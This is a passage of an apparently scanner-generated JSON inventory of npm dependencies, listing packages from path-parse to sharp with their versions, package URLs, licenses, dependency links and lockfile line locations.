"StartLine": 7703, "EndLine": 7711 } ], "AnalyzedBy": "npm" }, { "ID": "path-parse@1.0.7", "Name": "path-parse", "Identifier": { "PURL": "pkg:npm/path-parse@1.0.7", "UID": "5fc91ddfc1e3f957" }, "Version": "1.0.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7712, "EndLine": 7717 } ], "AnalyzedBy": "npm" }, { "ID": "path-scurry@1.11.1", "Name": "path-scurry", "Identifier": { "PURL": "pkg:npm/path-scurry@1.11.1", "UID": "59f0767f2920bf1e" }, "Version": "1.11.1", "Licenses": [ "BlueOak-1.0.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "lru-cache@10.4.3", "minipass@7.1.3" ], "Locations": [ { "StartLine": 7718, "EndLine": 7733 } ], "AnalyzedBy": "npm" }, { "ID": "path-to-regexp@0.1.13", "Name": "path-to-regexp", "Identifier": { "PURL": "pkg:npm/path-to-regexp@0.1.13", "UID": "c193e2f333d178cf" }, "Version": "0.1.13", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7740, "EndLine": 7745 } ], "AnalyzedBy": "npm" }, { "ID": "peberminta@0.9.0", "Name": "peberminta", "Identifier": { "PURL": "pkg:npm/peberminta@0.9.0", "UID": "919b9c54b0c39c29" }, "Version": "0.9.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7763, "EndLine": 7771 } ], "AnalyzedBy": "npm" }, { "ID": "picocolors@1.1.1", "Name": "picocolors", "Identifier": { "PURL": "pkg:npm/picocolors@1.1.1", "UID": "3516ead490b51122" }, "Version": "1.1.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7772, "EndLine": 7777 } ], "AnalyzedBy": "npm" }, { "ID": "picomatch@2.3.2", "Name": "picomatch", "Identifier": { "PURL": "pkg:npm/picomatch@2.3.2", "UID": "60649f903502eedb" }, "Version": "2.3.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7778, "EndLine": 7789 } ], "AnalyzedBy": "npm" }, { "ID": "picomatch@4.0.4", "Name": "picomatch", "Identifier": { "PURL": "pkg:npm/picomatch@4.0.4", "UID": "fcb1aa4ac467326f" }, "Version": "4.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9727, "EndLine": 9738 } ], "AnalyzedBy": "npm" }, { "ID": "pify@2.3.0", "Name": "pify", "Identifier": { "PURL": "pkg:npm/pify@2.3.0", "UID": "ffcf88ecd1091ae9" }, "Version": "2.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7790, "EndLine": 7798 } ], "AnalyzedBy": "npm" }, { "ID": "pirates@4.0.7", "Name": "pirates", "Identifier": { "PURL": "pkg:npm/pirates@4.0.7", "UID": "2b4687ed1a4f41a2" }, "Version": "4.0.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7799, "EndLine": 7807 } ], "AnalyzedBy": "npm" }, { "ID": "png-js@2.0.0", "Name": "png-js", "Identifier": { "PURL": "pkg:npm/png-js@2.0.0", "UID": "f8045f0eb55d5433" }, "Version": "2.0.0", "Indirect": true, "Relationship": "indirect", "DependsOn": [ "fflate@0.8.2" ], "Locations": [ { "StartLine": 7827, "EndLine": 7834 } ], "AnalyzedBy": "npm" }, { "ID": "pngjs@5.0.0", "Name": "pngjs", "Identifier": { "PURL": "pkg:npm/pngjs@5.0.0", "UID": "3a5b7443f0b32932" }, "Version": "5.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7835, "EndLine": 7843 } ], "AnalyzedBy": "npm" }, { "ID": "postcss@8.4.31", "Name": "postcss", "Identifier": { "PURL": "pkg:npm/postcss@8.4.31", "UID": "ddafc079bb8c814b" }, "Version": "8.4.31", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "nanoid@3.3.11", "picocolors@1.1.1", "source-map-js@1.2.1" ], "Locations": [ { "StartLine": 7312, "EndLine": 7339 } ], "AnalyzedBy": "npm" }, { "ID": "postcss@8.5.12", "Name": "postcss", "Identifier": { "PURL": "pkg:npm/postcss@8.5.12", "UID": "510f0955b45ef87e" }, "Version": "8.5.12", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "nanoid@3.3.11", "picocolors@1.1.1", "source-map-js@1.2.1" ], "Locations": [ { "StartLine": 7844, "EndLine": 7871 } ], "AnalyzedBy": "npm" }, { "ID": "postcss-import@15.1.0", "Name": "postcss-import", "Identifier": { "PURL": "pkg:npm/postcss-import@15.1.0", "UID": "f68ec6730aaa0abf" }, "Version": "15.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "postcss-value-parser@4.2.0", "postcss@8.5.12", "read-cache@1.0.0", "resolve@1.22.12" ], "Locations": [ { "StartLine": 7872, "EndLine": 7888 } ], "AnalyzedBy": "npm" }, { "ID": "postcss-js@4.1.0", "Name": "postcss-js", "Identifier": { "PURL": "pkg:npm/postcss-js@4.1.0", "UID": "3004fa81a2fa2f64" }, "Version": "4.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "camelcase-css@2.0.1", "postcss@8.5.12" ], "Locations": [ { "StartLine": 7889, "EndLine": 7913 } ], "AnalyzedBy": "npm" }, { "ID": "postcss-load-config@6.0.1", "Name": "postcss-load-config", "Identifier": { "PURL": "pkg:npm/postcss-load-config@6.0.1", "UID": "b2168b5451e9b656" }, "Version": "6.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "jiti@1.21.7", "lilconfig@3.1.3", "postcss@8.5.12" ], "Locations": [ { "StartLine": 7914, "EndLine": 7955 } ], "AnalyzedBy": "npm" }, { "ID": "postcss-nested@6.2.0", "Name": "postcss-nested", "Identifier": { "PURL": "pkg:npm/postcss-nested@6.2.0", "UID": "1554b2cd1b1fb9f5" }, "Version": "6.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "postcss-selector-parser@6.1.2", "postcss@8.5.12" ], "Locations": [ { "StartLine": 7956, "EndLine": 7980 } ], "AnalyzedBy": "npm" }, { "ID": "postcss-selector-parser@6.1.2", "Name": "postcss-selector-parser", "Identifier": { "PURL": "pkg:npm/postcss-selector-parser@6.1.2", "UID": "ce8dc8a9732d6de5" }, "Version": "6.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "cssesc@3.0.0", "util-deprecate@1.0.2" ], "Locations": [ { "StartLine": 7981, "EndLine": 7993 } ], "AnalyzedBy": "npm" }, { "ID": "postcss-value-parser@4.2.0", "Name": "postcss-value-parser", "Identifier": { "PURL": "pkg:npm/postcss-value-parser@4.2.0", "UID": "16976fc10c402bfe" }, "Version": "4.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7994, "EndLine": 7999 } ], "AnalyzedBy": "npm" }, { "ID": "prisma@5.22.0", "Name": "prisma", "Identifier": { "PURL": "pkg:npm/prisma@5.22.0", "UID": "8c42509e5c61d45d" }, "Version": "5.22.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@prisma/engines@5.22.0", "fsevents@2.3.3" ], "Locations": [ { "StartLine": 8061, "EndLine": 8080 } ], "AnalyzedBy": "npm" }, { "ID": "process-nextick-args@2.0.1", "Name": "process-nextick-args", "Identifier": { "PURL": "pkg:npm/process-nextick-args@2.0.1", "UID": "6cbd56d605e8447a" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8081, "EndLine": 8086 } ], "AnalyzedBy": "npm" }, { "ID": "prop-types@15.8.1", "Name": "prop-types", "Identifier": { "PURL": "pkg:npm/prop-types@15.8.1", "UID": "ae4d615e7c7dd38b" }, "Version": "15.8.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "loose-envify@1.4.0", "object-assign@4.1.1", "react-is@16.13.1" ], "Locations": [ { "StartLine": 8087, "EndLine": 8097 } ], "AnalyzedBy": "npm" }, { "ID": "proto-list@1.2.4", "Name": "proto-list", "Identifier": { "PURL": "pkg:npm/proto-list@1.2.4", "UID": "896c72bafef6c55" }, "Version": "1.2.4", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8098, "EndLine": 8103 } ], "AnalyzedBy": "npm" }, { "ID": "proto3-json-serializer@2.0.2", "Name": "proto3-json-serializer", "Identifier": { "PURL": "pkg:npm/proto3-json-serializer@2.0.2", "UID": "ff939f88e8b39329" }, "Version": "2.0.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "protobufjs@7.5.6" ], "Locations": [ { "StartLine": 8104, "EndLine": 8116 } ], "AnalyzedBy": "npm" }, { "ID": "protobufjs@7.5.6", "Name": "protobufjs", "Identifier": { "PURL": "pkg:npm/protobufjs@7.5.6", "UID": "62e85fbdb853ebe0" }, "Version": "7.5.6", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@protobufjs/aspromise@1.1.2", "@protobufjs/base64@1.1.2", "@protobufjs/codegen@2.0.5", "@protobufjs/eventemitter@1.1.0", "@protobufjs/fetch@1.1.0", "@protobufjs/float@1.0.2", "@protobufjs/inquire@1.1.1", "@protobufjs/path@1.1.2", "@protobufjs/pool@1.1.0", "@protobufjs/utf8@1.1.1", "@types/node@20.19.39", "long@5.3.2" ], "Locations": [ { "StartLine": 8117, "EndLine": 8141 } ], "AnalyzedBy": "npm" }, { "ID": "proxy-addr@2.0.7", "Name": "proxy-addr", "Identifier": { "PURL": "pkg:npm/proxy-addr@2.0.7", "UID": "23d7a029fe2308cb" }, "Version": "2.0.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "forwarded@0.2.0", "ipaddr.js@1.9.1" ], "Locations": [ { "StartLine": 8142, "EndLine": 8154 } ], "AnalyzedBy": "npm" }, { "ID": "proxy-from-env@2.1.0", "Name": "proxy-from-env", "Identifier": { "PURL": "pkg:npm/proxy-from-env@2.1.0", "UID": "403a81bd1adb3a24" }, "Version": "2.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8155, "EndLine": 8163 } ], "AnalyzedBy": "npm" }, { "ID": "qrcode@1.5.4", "Name": "qrcode", "Identifier": { "PURL": "pkg:npm/qrcode@1.5.4", "UID": "3ec0d227003c7497" }, "Version": "1.5.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "dijkstrajs@1.0.3", "pngjs@5.0.0", "yargs@15.4.1" ], "Locations": [ { "StartLine": 8174, "EndLine": 8190 } ], "AnalyzedBy": "npm" }, { "ID": "qs@6.14.2", "Name": "qs", "Identifier": { "PURL": "pkg:npm/qs@6.14.2", "UID": "113e3df86ddfa56f" }, "Version": "6.14.2", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "side-channel@1.1.0" ], "Locations": [ { "StartLine": 8309, "EndLine": 8323 } ], "AnalyzedBy": "npm" }, { "ID": "qs@6.15.1", "Name": "qs", "Identifier": { "PURL": "pkg:npm/qs@6.15.1", "UID": "d72f459e7ded52a8" }, "Version": "6.15.1", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "side-channel@1.1.0" ], "Locations": [ { "StartLine": 3736, "EndLine": 3750 } ], "AnalyzedBy": "npm" }, { "ID": "queue@6.0.2", "Name": "queue", "Identifier": { "PURL": "pkg:npm/queue@6.0.2", "UID": "d122896362c4e690" }, "Version": "6.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "inherits@2.0.4" ], "Locations": [ { "StartLine": 8324, "EndLine": 8332 } ], "AnalyzedBy": "npm" }, { "ID": "queue-microtask@1.2.3", "Name": "queue-microtask", "Identifier": { "PURL": "pkg:npm/queue-microtask@1.2.3", "UID": "e769f0d5fe744aed" }, "Version": "1.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8333, "EndLine": 8352 } ], "AnalyzedBy": "npm" }, { "ID": "range-parser@1.2.1", "Name": "range-parser", "Identifier": { "PURL": "pkg:npm/range-parser@1.2.1", "UID": "abd7718da27d4627" }, "Version": "1.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8353, "EndLine": 8361 } ], "AnalyzedBy": "npm" }, { "ID": "raw-body@2.5.3", "Name": "raw-body", "Identifier": { "PURL": "pkg:npm/raw-body@2.5.3", "UID": "4f51189664d4ea57" }, "Version": "2.5.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "bytes@3.1.2", "http-errors@2.0.1", "iconv-lite@0.4.24", "unpipe@1.0.0" ], "Locations": [ { "StartLine": 8362, "EndLine": 8376 } ], "AnalyzedBy": "npm" }, { "ID": "react@18.3.1", "Name": "react", "Identifier": { "PURL": "pkg:npm/react@18.3.1", "UID": "7a732aec3d05a7c4" }, "Version": "18.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "loose-envify@1.4.0" ], "Locations": [ { "StartLine": 8377, "EndLine": 8388 } ], "AnalyzedBy": "npm" }, { "ID": "react-dom@18.3.1", "Name": "react-dom", "Identifier": { "PURL": "pkg:npm/react-dom@18.3.1", "UID": "4a1596165ae174b5" }, "Version": "18.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "loose-envify@1.4.0", "react@18.3.1", "scheduler@0.23.2" ], "Locations": [ { "StartLine": 8389, "EndLine": 8401 } ], "AnalyzedBy": "npm" }, { "ID": "react-is@16.13.1", "Name": "react-is", "Identifier": { "PURL": "pkg:npm/react-is@16.13.1", "UID": "dd2055a708b19e28" }, "Version": "16.13.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8411, "EndLine": 8416 } ], "AnalyzedBy": "npm" }, { "ID": "react-is@18.3.1", "Name": "react-is", "Identifier": { "PURL": "pkg:npm/react-is@18.3.1", "UID": "7c48b680c40ac547" }, "Version": "18.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8054, "EndLine": 8060 }, { "StartLine": 8531, "EndLine": 8536 } ], "AnalyzedBy": "npm" }, { "ID": "react-promise-suspense@0.3.4", "Name": "react-promise-suspense", "Identifier": { "PURL": "pkg:npm/react-promise-suspense@0.3.4", "UID": "45bf18db5c7b7929" }, "Version": "0.3.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "fast-deep-equal@2.0.1" ], "Locations": [ { "StartLine": 8417, "EndLine": 8425 } ], "AnalyzedBy": "npm" }, { "ID": "react-smooth@4.0.4", "Name": "react-smooth", "Identifier": { "PURL": "pkg:npm/react-smooth@4.0.4", "UID": "40b5bceae291051d" }, "Version": "4.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "fast-equals@5.4.0", "prop-types@15.8.1", "react-dom@18.3.1", "react-transition-group@4.4.5", "react@18.3.1" ], "Locations": [ { "StartLine": 8432, "EndLine": 8446 } ], "AnalyzedBy": "npm" }, { "ID": "react-transition-group@4.4.5", "Name": "react-transition-group", "Identifier": { "PURL": "pkg:npm/react-transition-group@4.4.5", "UID": "7e3dc956d12bc1e6" }, "Version": "4.4.5", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/runtime@7.29.2", "dom-helpers@5.2.1", "loose-envify@1.4.0", "prop-types@15.8.1", "react-dom@18.3.1", "react@18.3.1" ], "Locations": [ { "StartLine": 8447, "EndLine": 8462 } ], "AnalyzedBy": "npm" }, { "ID": "read-cache@1.0.0", "Name": "read-cache", "Identifier": { "PURL": "pkg:npm/read-cache@1.0.0", "UID": "1dbf3b8bd22286d7" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "pify@2.3.0" ], "Locations": [ { "StartLine": 8463, "EndLine": 8471 } ], "AnalyzedBy": "npm" }, { "ID": "readable-stream@2.3.8", "Name": "readable-stream", "Identifier": { "PURL": "pkg:npm/readable-stream@2.3.8", "UID": "3627344f001f9f48" }, "Version": "2.3.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "core-util-is@1.0.3", "inherits@2.0.4", "isarray@1.0.0", "process-nextick-args@2.0.1", "safe-buffer@5.1.2", "string_decoder@1.1.1", "util-deprecate@1.0.2" ], "Locations": [ { "StartLine": 4158, "EndLine": 4172 } ], "AnalyzedBy": "npm" }, { "ID": "readable-stream@3.6.2", "Name": "readable-stream", "Identifier": { "PURL": "pkg:npm/readable-stream@3.6.2", "UID": "861aa22817f84aea" }, "Version": "3.6.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "inherits@2.0.4", "string_decoder@1.3.0", "util-deprecate@1.0.2" ], "Locations": [ { "StartLine": 8472, "EndLine": 8486 } ], "AnalyzedBy": "npm" }, { "ID": "readdirp@3.6.0", "Name": "readdirp", "Identifier": { "PURL": "pkg:npm/readdirp@3.6.0", "UID": "2a7327b3dc0a9986" }, "Version": "3.6.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "picomatch@2.3.2" ], "Locations": [ { "StartLine": 8487, "EndLine": 8498 } ], "AnalyzedBy": "npm" }, { "ID": "recharts@2.15.4", "Name": "recharts", "Identifier": { "PURL": "pkg:npm/recharts@2.15.4", "UID": "233835ec047727dd" }, "Version": "2.15.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "clsx@2.1.1", "eventemitter3@4.0.7", "lodash@4.18.1", "react-dom@18.3.1", "react-is@18.3.1", "react-smooth@4.0.4", "react@18.3.1", "recharts-scale@0.4.5", "tiny-invariant@1.3.3", "victory-vendor@36.9.2" ], "Locations": [ { "StartLine": 8499, "EndLine": 8521 } ], "AnalyzedBy": "npm" }, { "ID": "recharts-scale@0.4.5", "Name": "recharts-scale", "Identifier": { "PURL": "pkg:npm/recharts-scale@0.4.5", "UID": "36b1e17dee065b18" }, "Version": "0.4.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "decimal.js-light@2.5.1" ], "Locations": [ { "StartLine": 8522, "EndLine": 8530 } ], "AnalyzedBy": "npm" }, { "ID": "redis-errors@1.2.0", "Name": "redis-errors", "Identifier": { "PURL": "pkg:npm/redis-errors@1.2.0", "UID": "52d738f0a589c31e" }, "Version": "1.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8537, "EndLine": 8545 } ], "AnalyzedBy": "npm" }, { "ID": "redis-parser@3.0.0", "Name": "redis-parser", "Identifier": { "PURL": "pkg:npm/redis-parser@3.0.0", "UID": "e8456c2a45181" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "redis-errors@1.2.0" ], "Locations": [ { "StartLine": 8546, "EndLine": 8557 } ], "AnalyzedBy": "npm" }, { "ID": "require-directory@2.1.1", "Name": "require-directory", "Identifier": { "PURL": "pkg:npm/require-directory@2.1.1", "UID": "69d3d72a34425c28" }, "Version": "2.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8558, "EndLine": 8566 } ], "AnalyzedBy": "npm" }, { "ID": "require-from-string@2.0.2", "Name": "require-from-string", "Identifier": { "PURL": "pkg:npm/require-from-string@2.0.2", "UID": "da251d648c51218a" }, "Version": "2.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8567, "EndLine": 8575 } ], "AnalyzedBy": "npm" }, { "ID": "require-main-filename@2.0.0", "Name": "require-main-filename", "Identifier": { "PURL": "pkg:npm/require-main-filename@2.0.0", "UID": "508ba374df3bd22f" }, "Version": "2.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8576, "EndLine": 8581 } ], "AnalyzedBy": "npm" }, { "ID": "resend@3.5.0", "Name": "resend", "Identifier": { "PURL": "pkg:npm/resend@3.5.0", "UID": "ac0d337853058be8" }, "Version": "3.5.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@react-email/render@0.0.16" ], "Locations": [ { "StartLine": 8582, "EndLine": 8593 } ], "AnalyzedBy": "npm" }, { "ID": "resolve@1.22.12", "Name": "resolve", "Identifier": { "PURL": "pkg:npm/resolve@1.22.12", "UID": "68c1387a0f0cca57" }, "Version": "1.22.12", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "es-errors@1.3.0", "is-core-module@2.16.1", "path-parse@1.0.7", "supports-preserve-symlinks-flag@1.0.0" ], "Locations": [ { "StartLine": 8594, "EndLine": 8614 } ], "AnalyzedBy": "npm" }, { "ID": "restructure@3.0.2", "Name": "restructure", "Identifier": { "PURL": "pkg:npm/restructure@3.0.2", "UID": "af5fb30002f01e58" }, "Version": "3.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8625, "EndLine": 8630 } ], "AnalyzedBy": "npm" }, { "ID": "retry@0.13.1", "Name": "retry", "Identifier": { "PURL": "pkg:npm/retry@0.13.1", "UID": "182c194e5a5d1b49" }, "Version": "0.13.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8631, "EndLine": 8640 } ], "AnalyzedBy": "npm" }, { "ID": "retry-request@7.0.2", "Name": "retry-request", "Identifier": { "PURL": "pkg:npm/retry-request@7.0.2", "UID": "9ffcff06c68d9d7" }, "Version": "7.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/request@2.48.13", "extend@3.0.2", "teeny-request@9.0.0" ], "Locations": [ { "StartLine": 8641, "EndLine": 8655 } ], "AnalyzedBy": "npm" }, { "ID": "reusify@1.1.0", "Name": "reusify", "Identifier": { "PURL": "pkg:npm/reusify@1.1.0", "UID": "4c82e6526cf4cba6" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8656, "EndLine": 8665 } ], "AnalyzedBy": "npm" }, { "ID": "run-parallel@1.2.0", "Name": "run-parallel", "Identifier": { "PURL": "pkg:npm/run-parallel@1.2.0", "UID": "5d1493af643922d4" }, "Version": "1.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "queue-microtask@1.2.3" ], "Locations": [ { "StartLine": 8735, "EndLine": 8757 } ], "AnalyzedBy": "npm" }, { "ID": "safe-buffer@5.1.2", "Name": "safe-buffer", "Identifier": { "PURL": "pkg:npm/safe-buffer@5.1.2", "UID": "6319cf09afcbfdf4" }, "Version": "5.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3654, "EndLine": 3659 }, { "StartLine": 4173, "EndLine": 4178 } ], "AnalyzedBy": "npm" }, { "ID": "safe-buffer@5.2.1", "Name": "safe-buffer", "Identifier": { "PURL": "pkg:npm/safe-buffer@5.2.1", "UID": "a41326afe81fb30a" }, "Version": "5.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8758, "EndLine": 8777 } ], "AnalyzedBy": "npm" }, { "ID": "safer-buffer@2.1.2", "Name": "safer-buffer", "Identifier": { "PURL": "pkg:npm/safer-buffer@2.1.2", "UID": "db8c15626670e81e" }, "Version": "2.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8778, "EndLine": 8783 } ], "AnalyzedBy": "npm" }, { "ID": "scheduler@0.17.0", "Name": "scheduler", "Identifier": { "PURL": "pkg:npm/scheduler@0.17.0", "UID": "da5599d062eee219" }, "Version": "0.17.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "loose-envify@1.4.0", "object-assign@4.1.1" ], "Locations": [ { "StartLine": 8784, "EndLine": 8793 } ], "AnalyzedBy": "npm" }, { "ID": "scheduler@0.23.2", "Name": "scheduler", "Identifier": { "PURL": "pkg:npm/scheduler@0.23.2", "UID": "19442950b16c45d4" }, "Version": "0.23.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "loose-envify@1.4.0" ], "Locations": [ { "StartLine": 8402, "EndLine": 8410 } ], "AnalyzedBy": "npm" }, { "ID": "scmp@2.1.0", "Name": "scmp", "Identifier": { "PURL": "pkg:npm/scmp@2.1.0", "UID": "7177b704e162dd2d" }, "Version": "2.1.0", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8794, "EndLine": 8800 } ], "AnalyzedBy": "npm" }, { "ID": "selderee@0.11.0", "Name": "selderee", "Identifier": { "PURL": "pkg:npm/selderee@0.11.0", "UID": "ea7d1e69feb9e538" }, "Version": "0.11.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "parseley@0.12.1" ], "Locations": [ { "StartLine": 8801, "EndLine": 8812 } ], "AnalyzedBy": "npm" }, { "ID": "semver@7.7.4", "Name": "semver", "Identifier": { "PURL": "pkg:npm/semver@7.7.4", "UID": "924c9f6b1acf6a0e" }, "Version": "7.7.4", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8813, "EndLine": 8824 } ], "AnalyzedBy": "npm" }, { "ID": "send@0.19.2", "Name": "send", "Identifier": { "PURL": "pkg:npm/send@0.19.2", "UID": "f47423af5a4e434b" }, "Version": "0.19.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "debug@2.6.9", "depd@2.0.0", "destroy@1.2.0", "encodeurl@2.0.0", "escape-html@1.0.3", "etag@1.8.1", "fresh@0.5.2", "http-errors@2.0.1", "mime@1.6.0", "ms@2.1.3", "on-finished@2.4.1", "range-parser@1.2.1", "statuses@2.0.2" ], "Locations": [ { "StartLine": 8825, "EndLine": 8848 } ], "AnalyzedBy": "npm" }, { "ID": "serve-static@1.16.3", "Name": "serve-static", "Identifier": { "PURL": "pkg:npm/serve-static@1.16.3", "UID": "aa1f68bf51bcd498" }, "Version": "1.16.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "encodeurl@2.0.0", "escape-html@1.0.3", "parseurl@1.3.3", "send@0.19.2" ], "Locations": [ { "StartLine": 8876, "EndLine": 8890 } ], "AnalyzedBy": "npm" }, { "ID": "set-blocking@2.0.0", "Name": "set-blocking", "Identifier": { "PURL": "pkg:npm/set-blocking@2.0.0", "UID": "394fc4326811e7b3" }, "Version": "2.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8891, "EndLine": 8896 } ], "AnalyzedBy": "npm" }, { "ID": "setprototypeof@1.2.0", "Name": "setprototypeof", "Identifier": { "PURL": "pkg:npm/setprototypeof@1.2.0", "UID": "5c96ffe298f11408" }, "Version": "1.2.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8897, "EndLine": 8902 } ], "AnalyzedBy": "npm" }, { "ID": "sharp@0.34.5", "Name": "sharp", "Identifier": { "PURL": "pkg:npm/sharp@0.34.5", "UID": "fcd063eeae81c705" }, "Version": "0.34.5", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@img/colour@1.1.0", "@img/sharp-darwin-arm64@0.34.5", "@img/sharp-darwin-x64@0.34.5", "@img/sharp-libvips-darwin-arm64@1.2.4", "@img/sharp-libvips-darwin-x64@1.2.4", "@img/sharp-libvips-linux-arm64@1.2.4", "@img/sharp-libvips-linux-arm@1.2.4", "@img/sharp-libvips-linux-ppc64@1.2.4", "@img/sharp-libvips-linux-riscv64@1.2.4", "@img/sharp-libvips-linux-s390x@1.2.4", "@img/sharp-libvips-linux-x64@1.2.4", "@img/sharp-libvips-linuxmusl-arm64@1.2.4", "@img/sharp-libvips-linuxmusl-x64@1.2.4", "@img/sharp-linux-arm64@0.34.5", "@img/sharp-linux-arm@0.34.5", "@img/sharp-linux-ppc64@0.34.5", "@img/sharp-linux-riscv64@0.34.5", "@img/sharp-linux-s390x@0.34.5", "@img/sharp-linux-x64@0.34.5", "@img/sharp-linuxmusl-arm64@0.34.5", "@img/sharp-linuxmusl-x64@0.34.5", "@img/sharp-wasm32@0.34.5", "@img/sharp-win32-arm64@0.34.5", "@img/sharp-win32-ia32@0.34.5", "@img/sharp-win32-x64@0.34.5", "detect-libc@2.1.2", "semver@7.7.4" ], "Locations": [ { "StartLine": 8903, "EndLine": 8945 } ], "AnalyzedBy": "npm" }, { "ID": "shebang-command@2.0.0", "Name": "shebang-command", "Identifier": { "PURL": 